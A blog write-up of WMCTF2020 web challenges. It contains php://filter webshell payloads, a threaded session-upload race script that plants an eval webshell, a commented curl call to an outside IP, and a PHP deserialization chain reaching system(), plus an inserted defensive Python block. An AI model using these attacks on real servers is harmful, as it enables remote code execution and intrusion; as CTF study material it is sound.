WMCTF2020

Checkin1

It looks intimidating, but the filtering evidently was not done properly: requesting /flag directly returned the flag.


Checkin2

The intended solution still requires writing a shell.

Because "file_put_contents can take a pseudo-protocol (stream wrapper), and when the wrapper is processed the filter name is urldecoded once", special characters can be double-URL-encoded to get past the filter, for example:

php://filter/write=string.%2572ot13|<?cuc cucvasb();?>|/resource=1.php 


The official writeup also mentions a zlib filter approach, but with the payload given there I still could not construct a shell:

php://filter/zlib.deflate|string.tolower|zlib.inflate|?><?php eval($_GET[1]);?>/resource=1.php 

string.tolower combined with zlib swallows the spaces, but that raises the question: if the spaces are swallowed, how do you write PHP at all? It also eats some other characters; presumably the intended approach is to write compressed data and then decompress it.
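As an added illustration (not from the original writeup), the following Python models the two decode layers the bypass above relies on: PHP urldecodes the query string once when building $_GET, and the php://filter wrapper urldecodes each filter name once more. A substring blocklist applied to the $_GET value misses string.%72ot13, a check that decodes the chain the way the wrapper does catches it, and the robust fix is to accept only plain relative paths. SUSPICIOUS_FILTERS and the helper names are my own; the two payloads are the ones quoted above.

```python
from urllib.parse import unquote, unquote_plus

# Payloads quoted from the writeup, as they appear in the URL before $_GET decoding.
ROT13_PAYLOAD = "php://filter/write=string.%2572ot13|<?cuc cucvasb();?>|/resource=1.php"
ZLIB_PAYLOAD = ("php://filter/zlib.deflate|string.tolower|zlib.inflate|"
                "?><?php eval($_GET[1]);?>/resource=1.php")

# Filters that rewrite bytes between the content check and the write (list is
# constructed for this example, not exhaustive).
SUSPICIOUS_FILTERS = {
    "string.rot13", "string.tolower", "string.toupper", "convert.iconv",
    "convert.base64-decode", "zlib.deflate", "zlib.inflate",
}

def as_seen_by_php_get(raw_query_value):
    """Layer 1: PHP urldecodes the query string once when it builds $_GET."""
    return unquote_plus(raw_query_value)

def php_filter_chain(path):
    """Layer 2: parse the chain the way the php://filter wrapper does. The text
    between 'php://filter/' and '/resource=' is split on '/', a segment may
    carry a read=/write= prefix, names are split on '|' and urldecoded once."""
    if not path.lower().startswith("php://filter/"):
        return []
    spec = path[len("php://filter/"):]
    cut = spec.find("/resource=")
    if cut != -1:
        spec = spec[:cut]
    names = []
    for segment in filter(None, spec.split("/")):
        for prefix in ("read=", "write="):
            if segment.lower().startswith(prefix):
                segment = segment[len(prefix):]
        names.extend(unquote(n) for n in segment.split("|") if n)
    return names

def naive_blocklist_check(path):
    """Substring match on the $_GET value: never sees 'rot13' in '%72ot13'."""
    low = path.lower()
    return any(f in low for f in SUSPICIOUS_FILTERS)

def wrapper_aware_check(path):
    """Decode like the wrapper before matching, so '%72ot13' is caught."""
    return any(n.lower() in SUSPICIOUS_FILTERS for n in php_filter_chain(path))

def is_plain_relative_path(path):
    """The actual fix: allow-list plain relative paths, never a stream wrapper."""
    return "://" not in path and not path.startswith("/") and ".." not in path.split("/")
```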

Make PHP Great Again-1

Write a session file under /tmp (via PHP_SESSION_UPLOAD_PROGRESS), then include it to write a shell; some requests get a 429 along the way.

import requests
import io
import time
import threading

# url = 'http://web_checkin2.wmctf.wetolink.com/'
url = 'http://no_body_knows_php_better_than_me.glzjin.wmctf.wetolink.com'


def upload(session):
    # Keep sending multipart uploads with PHP_SESSION_UPLOAD_PROGRESS set, so
    # PHP repeatedly writes /tmp/sess_wanderer with that value inside it.
    file_body = b'a' * 1024 * 50
    while 1:
        # A fresh BytesIO each round; a reused one is at EOF after the first
        # request and would upload an empty file.
        files = {'file': ('1.txt', io.BytesIO(file_body))}
        # files = {'file': 123}
        resp = session.post(url, files=files,
                            data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_GET[0]);?>'},
                            cookies={"PHPSESSID": "wanderer"})
        print(resp.status_code)
        time.sleep(0.6)


def cmd(session):
    # Race the upload: include the session file while it still exists and let
    # the eval() drop a persistent shell at /tmp/wander.txt.
    params = {
        'file': '/tmp/sess_wanderer',
        '0': 'file_put_contents(%27/tmp/wander.txt%27,%27<?php%20eval($_POST[0])?>%27);'
    }
    # url2 = "http://no_body_knows_php_better_than_me.glzjin.wmctf.wetolink.com/?file=/tmp/sess_wanderer&0=system('curl http://123.57.240.205');"
    while 1:
        time.sleep(0.7)
        resp = session.get(url, params=params)
        print(resp.status_code)


if __name__ == "__main__":
    # One shared session; not closed while the worker threads still use it.
    session = requests.Session()
    for _ in range(1, 10):
        threading.Thread(target=upload, args=(session,)).start()
    for _ in range(1, 10):
        threading.Thread(target=cmd, args=(session,)).start()


Including the session file:


Webweb

Code audit

Call chain:

ws.php: Agent::__destruct

mapper.php:Mapper::__call

mapper.php:Mapper::find


<?php
namespace DB\SQL;

class Mapper
{
    public function __construct()
    {
        // Mapper::find() walks the adhoc fields and passes each key through
        // $this->db->quotekey(); the key is therefore the command to run.
        $this->adhoc = array('cat /etc/flagzaizheli' => ["expr" => "test"]);
        // quotekey() is not a real method on Mapper, so it is resolved by
        // Mapper::__call, which looks it up in props and ends up calling system().
        $this->props = array('quotekey' => "system");
        // Point db back at this object so the call lands in Mapper::__call.
        $this->db = $this;
    }
}

namespace cli;

use DB\SQL\Mapper;

class WS
{
    public function __construct()
    {
        // Holding the Agent here means it is destructed along with the WS object.
        $this->events = new Agent();
    }
}

class Agent
{
    public function __construct()
    {
        // Agent::__destruct invokes the 'disconnect' handler from
        // $this->server->events, which here is [Mapper, 'find'].
        $this->server = $this;
        $this->events = array("disconnect" => [new Mapper(), 'find']);
    }
}

echo urlencode(serialize(new WS()));

The flag is at /etc/flagzaizheli

Comments

  1. tinmin
    3 months ago
    2020-9-02 11:42:38

    Master, do you have the Webweb challenge source that you could share?

  2. w4nder (blog author)
    3 months ago
    2020-9-02 14:47:12

    It should be this one: https://wwe.lanzous.com/iQiRYgaacmf
